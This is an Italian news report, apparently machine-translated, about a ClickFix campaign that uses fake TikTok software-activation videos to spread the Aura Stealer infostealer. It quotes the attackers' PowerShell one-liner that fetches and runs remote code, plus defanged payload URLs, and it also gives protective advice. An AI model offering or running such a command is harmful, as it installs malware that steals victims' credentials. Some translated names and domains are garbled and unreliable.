I criminali informatici stanno distribuendo malware in grado di rubare informazioni su TikTok utilizzando video camuffati da guide per l’attivazione di software gratuiti. Secondo Computer che dormeXavier Mertens, gestore dell’ISC, ha identificato la campagna in corso, che utilizza un metodo di ingegneria sociale noto come attacco ClickFix per infettare i sistemi informatici. I video, osservati da Computer che dormeaffermano di fornire istruzioni per l’attivazione di software legittimo come Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. La campagna promuove anche servizi fittizi, tra cui “Netflix Premium” e “Spotify Premium”. Mertens ha osservato che questa attività è in gran parte la stessa di una campagna precedentemente osservata dalla società di sicurezza Trend Micro a maggio. I video utilizzano una tecnica di ingegneria sociale che presenta una soluzione apparentemente valida o una serie di istruzioni per indurre gli utenti a compromettere le proprie macchine. Questo attacco ClickFix induce gli utenti a eseguire comandi PowerShell dannosi. Ogni video visualizza un comando di una riga, come `iex (irm slmgr[.]win/photoshop)` e indica agli spettatori di eseguirlo con privilegi di amministratore. Il nome del programma nell’URL viene modificato per corrispondere al software impersonato; una falsa guida di Windows utilizzerebbe un URL contenente “windows” invece di “photoshop”. Quando il comando viene eseguito, PowerShell si connette al sito remoto `slmgr[.]win` per recuperare ed eseguire un altro script PowerShell. Questo script scarica due eseguibili dalle pagine Cloudflare. Il primo, da `https://file-epq[.]pagine[.]dev/updater.exe`, è una variante del malware Aura Stealer. Questo infostealer è progettato per raccogliere credenziali del browser salvate, cookie di autenticazione, dati del portafoglio di criptovaluta e altre credenziali dell’applicazione. I dati rubati vengono quindi caricati sugli aggressori, garantendo loro l’accesso agli account della vittima. Nell’ambito dell’attacco viene scaricato anche un secondo payload, `source.exe`. Secondo Mertens, questo eseguibile compila automaticamente il codice utilizzando il compilatore Visual C# integrato in .NET (`csc.exe`). Il codice risultante viene successivamente iniettato e lanciato direttamente in memoria. Lo scopo specifico di questo carico utile aggiuntivo rimane poco chiaro. Gli utenti che hanno eseguito questi passaggi dovrebbero considerare tutte le loro credenziali compromesse. La linea di condotta consigliata è reimpostare immediatamente le password su tutti i siti e servizi utilizzati per impedire l’accesso non autorizzato all’account e ulteriori furti di dati. Gli attacchi ClickFix sono diventati popolari nell’ultimo anno e vengono utilizzati per distribuire vari ceppi di malware nelle campagne di ransomware e furto di criptovaluta. Come regola generale, gli utenti non dovrebbero mai copiare testo da un sito Web ed eseguirlo in una finestra di dialogo del sistema operativo. Questo avviso include la barra degli indirizzi di Esplora file, il prompt dei comandi, i prompt di PowerShell, il terminale macOS e le shell Linux.
